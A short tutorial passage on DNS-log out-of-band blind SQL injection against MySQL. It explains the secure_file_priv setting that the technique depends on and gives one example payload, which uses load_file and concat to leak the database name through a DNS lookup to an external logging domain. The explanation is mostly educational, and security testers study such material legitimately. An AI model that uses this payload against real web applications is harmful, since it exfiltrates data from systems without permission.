Sometimes, when injecting, you may not get direct feedback, or you may not be able to use time-based blind injection. In such cases, you can use out-of-band channels, which means using other protocols or channels, such as HTTP requests, DNS resolution, SMB services, to exfiltrate data. DNS log blind injection can reduce the number of requests sent and achieve injection with direct feedback.
DNS log: It stores domain name information on the DNS server, recording user access information for domains like www.xxx.com.
Conditions for utilization:
secure_file_privin mysql.ini must be empty.- If
secure_file_privis null, importing and exporting are not allowed. - If
secure_file_privis set to /tmp, importing and exporting can only be done in the /tmp directory. - When
secure_file_privis empty, there are no restrictions, and importing and exporting are allowed.
Example:
1 | ?id=1' and load_file(concat('\\', (select database()), '.27epx0.ceye.io\abc'))--+" |